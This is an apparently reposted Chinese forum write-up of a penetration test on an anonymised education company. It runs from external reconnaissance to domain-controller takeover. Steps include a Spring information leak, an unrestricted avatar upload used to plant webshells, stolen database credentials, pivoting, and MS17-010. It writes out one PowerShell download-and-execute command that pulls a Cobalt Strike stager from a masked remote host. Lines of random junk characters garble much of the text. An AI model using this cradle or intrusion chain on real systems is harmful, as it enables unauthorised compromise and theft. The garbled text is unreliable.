|
' a+ @- b; ? _, C( Z, c 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
) V1 O2 R4 U! r" h- _# ?/ v
: A B9 Y" M1 H+ |4 [. R- O5 M5 S ?7 t& ?8 g
5 J, _- J% D7 }, W+ q2 Y! `6 {1 I
( r( Z+ ~" z3 ]
3 e# E# x3 c; s' ?3 b9 ~& N 正文
2 i6 _3 e3 w" T9 `" t" Y: c8 K
( e/ X6 ~/ F! q1 M6 @: w0 j3 B; `8 M
8 J' ~. i9 C5 t; G ; k& m* w$ M* L5 [& s8 D8 t
5 k4 N$ D- V6 T! v8 J
目标:www.xxxx.com(一家教育机构)
4 j8 s% j" `( M. d- {; ?: i4 x
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
5 @/ w8 ~, _, x( y' ]2 | - R. W% T7 W; G" F a
. X' z2 w' ?. D J4 F 
% z- i0 @' j! L7 W / h& {/ j# \9 \7 H( p2 q; H
% c& n1 A o4 A# x$ y. b, v5 U 进行了简单的信息搜集
9 p$ o1 M: v3 _4 v8 J
* ?0 r9 v0 I* D7 F
( F* L* |% B3 f+ e
" F$ g0 O5 m$ U5 u
% I$ H: m( c% r; E, M( h q8 @ 子域名搜集8 _4 d# Y, K( I/ M" G, t
# V. h n' n9 q" g4 D
/ O( ~- r( I" \/ B3 y% S( A
/ R3 ?' ~( _& Q' b2 E' O ' S# D$ e; y7 \
" ]( {8 |9 i6 I: x, _
fofa找资产
( G+ R J) t, V
4 T" Y) R6 H4 H& A
) h: d; L6 w7 C 0 p( Y! I* a5 \2 \9 c7 `" n4 \
3 e! Q: N+ \9 X! I 
/ D5 U; c1 ?" |/ j
' Z8 }: p* Y/ I, n* G) v$ z1 t d2 M9 H1 h! @: L
一共七个资产。去重之后只有两个。
# S+ [6 ?) g/ y! v
0 }% M; M# O5 m2 ]8 \! \% E6 b
$ i+ h" y& g+ r! f7 d G / q( d; x9 k, r0 u: S! E8 Z A' g
3 L# |# w4 [" z1 m4 z
目录探测
, q& r, ^, D$ `) J0 t5 b/ p3 r! H% Z 9 E+ q8 T- i8 [. O
9 K! [2 |( |- r7 b W! K  2 b$ }' C5 W6 n' s
# P; o& y6 c+ P8 l7 u. G
) C8 @' S9 Q2 C6 V, U 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
* t: G* Y. Q" p2 [& W, J8 Z
2 S( E1 w" j2 I0 N2 `% g) Q- D5 Q' F: t9 W
4 f1 [( p. D! d* k5 N
: A. T: ]0 t4 o8 F
我又尝试了通过修改返回包来绕过登录界面( }4 N3 x' }: t2 Z5 d. e
6 p4 ~1 T, Y" i( H0 q
8 r, X" _2 z7 p$ h% Q/ W3 U" J
0 @2 ^! s" B5 G) r. m0 d
. h. ~0 r9 F U/ Q1 w4 t! u8 D- _$ [/ n, o4 H
还是不行,尝试注入无果& i8 ^% M W6 t5 h: }
6 S% G9 q+ K. P
$ M5 t# n- F7 _- j4 ^1 z5 Q. b
! S4 b) s( \9 Q/ Z5 X' E& o 5 e# G4 E/ W1 d
0 W7 Z' A# q6 `: L) S' s4 Y/ E# z
不过我目录探测出了一处Spring信息泄露
$ e1 b9 ?: Z( G; [' @
# V/ T& Z! f3 Z z# D; e' \8 \* Z2 D8 j& `' ~7 T/ V* ^
& B/ a: J' q8 z0 P9 D6 D
6 k% [; u% L8 N3 j. [ ] 
% M" t: V6 y% y& ~ / O) K% u4 }' B& ?7 B! I: F! F
# l9 s% R* H$ l0 ]2 O8 `, I 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
9 e+ Z& V9 y2 ~" j0 y2 n % b# {' _2 J* F y9 B
/ o l. o( H1 z5 E' _& Z
% K7 h% E4 w1 A6 W3 b6 A 8 r/ c7 a- z$ U7 ]2 s' k! F6 a2 Z# ~- ]: P
7 m2 m% B& G2 u: Y$ T c( [ 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。) E/ t. _1 f# a3 S, q4 d! r F
, k1 D+ C( p" _0 A
4 R* n7 P/ j+ N4 o+ W) D 
& T6 Q# T5 j& |- ]* g' {
0 U) n! B% ]9 w! C5 J8 r! N. Z% W& H- [' [ _, z' r2 K/ G
获取有些师傅到这一步就手机抓包电脑测了。
" j3 _4 g0 U4 A( t. W" z; Y + @0 C2 t) d& E1 V) Y) l
?9 K/ e: e f9 e7 R5 a
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。) I9 \* Y) l- A# h0 a" J6 j o9 S
# Y. e4 L2 W; |, S- Y L( B: j+ F
其中在一个公众号发现了小程序,可以进行注册。
6 H5 r1 T6 {0 y7 q7 ]7 h( W
' }& B4 o# X: S, k! h: u9 _6 R* T4 U5 S
看到了头像上传,尝试上传获取WebShell3 ~+ ?) k6 ^! f4 \
4 h( _$ ^& H+ f& f0 c: D" z' |
6 L. v2 y S2 i! A
. V5 ]' ?% ~8 I$ q/ ~/ r
' h6 w% _# o$ p- y* I) w* x! M+ W2 p1 q7 `% a* d
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问9 S0 e# _& o* ^* E: r7 y# c
8 j* ^4 B2 _; o# Q
4 Y. z; Z* n3 g& S& Z* Q  * ?/ r! w: M9 _, ~4 S4 Q; H; d
' v7 {8 D1 U a: O8 x: A7 ^
( }; H H3 e, N6 ~
然后上了大马! S( W- q8 ]5 }- l# [0 h
. w2 ]. ?/ z( e( ?/ n
* k" r3 [. O7 R" m- I+ v  & o' b& D4 F1 S) S$ e! N" c
7 g M. O9 l' m# v6 \9 Z8 h
1 n/ {0 d. D# C8 O5 u5 v- S) L  + B7 ]2 D6 U4 z" h% Y/ a# {
5 ~+ X' o1 S% U$ `; O3 Y* N) }
2 O0 J0 F4 p% j4 r0 G 通过翻找文件发现数据库账号密码
% _+ B; m4 X' j# Q' `( k
5 B8 H3 E1 S% X* _ y" V9 O1 ]9 D( |4 \' i! C7 H! D: B9 ^
* o( ~6 v! J. x. p ! ~5 ?4 i4 I9 e/ A
! l2 E- Q3 t; x% z) j1 g1 @- F' `* ^ --内网渗透
- A, |7 C/ L1 j+ F 4 L0 V) ]' u7 d" O& W) c4 k
8 R; `6 C q! s8 f G
直接通过powershell执行 cs上线
3 V1 b9 p2 w5 y2 c7 H & E% q7 b# P6 @) `
6 u( ^) u" C$ q$ L) x+ `& @ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))": s3 O2 w, o7 Y7 Y7 e8 G* n' [/ w
, h, |3 A6 O' {/ W) H4 T# j% h
6 U% x2 l* n4 j1 P$ b% C% ?  $ O) H1 Z9 e y. ]4 X0 n
# N @/ b- s+ D5 ^. r% i2 E3 `& b+ b9 y* q0 U) `3 Z4 G
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破1 y2 k8 r! h0 R' D' m
+ w, I" D& L7 f5 c! s! D: U6 v! K" x9 c( M! T0 p7 c
. j3 F2 D/ N; J0 x- h2 J6 a' U8 P
# w1 N6 r$ \0 a: r" |8 ~+ j3 e- r+ \* g; ?/ G* L0 m
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
- ~$ B9 A! d) N/ I1 M
/ F, Z9 S1 E/ i L y
2 V9 N2 |( w' j# Q5 O2 C, [/ S( G# y$ m+ g* m( J/ {; x. L" s
8 R6 v: N2 ?" P8 t, M+ R
: G7 ? ~* ?, _( s0 r  . h, @; _9 q% x
: N4 c) q8 T" }6 y( G3 E3 @) d0 J1 T3 A- z2 _7 `# n
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
" a$ c" v9 ~ z: b" n7 c' ?- v+ W
& V3 K, V7 E4 s1 g6 P
3 x' L) e% q9 E1 O
8 \; L9 u8 K; D7 n v% X& f% x0 h, E- `
 . E" ^) X4 K0 ]& T
; u9 F/ N* Y( e) J- P4 ]0 g
3 R$ N; Y3 A# v% s
/ f5 w! S; V2 m& k$ }4 g0 h0 O
" | X2 _2 P* t% ]- j9 Z; n. @2 }0 D" v% h) w p
$ O1 J' k/ D# v: `3 ]5 T) P: T. O! |! |2 l' B4 x0 g+ x. @5 I
8 z% H; ^+ s/ w. C
6 A# Z3 k3 g* T; z5 h( m3 W( l+ M, k3 s5 r
小结
+ N, d( }6 y" n
( u% i2 X i |& W, y
; T0 p- p4 e- J' ?) B B0 T$ [+ a + a0 B7 M, X7 o
5 ?9 C: x. W3 \; C
, V+ o, t- ]3 k6 J/ \ 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!2 |. u- I4 q( y* U/ c/ [
- V* G$ k* y- e7 m" J5 j4 h6 U
4 o: ^9 S6 y* x ; h. X( S6 @& p/ `3 T1 S/ \& Y
2 F/ y: U1 C' x: @ [* f( b9 j1 D -
( i8 C1 M5 l! K
) ~ O4 T/ |" @: Q2 Z
0 R* Z6 V' W7 c8 ]" K. b% k- i& Z -
8 V; g% U9 t' d6 y. m / i k: l: O( y" [6 w0 K
! e! R3 @; f" c! D7 n& }+ V% r $ a& v2 g, x2 ~/ N6 p) ^
* E" G8 j( h3 S1 N7 E
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html7 K8 r% `0 j) v+ F
* H# R; V: Y9 j1 z6 E3 k; I/ q5 o( V0 }' K+ D% q0 l0 _. p
: v2 P5 U1 ^1 ~) k7 b; r( _' F x
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对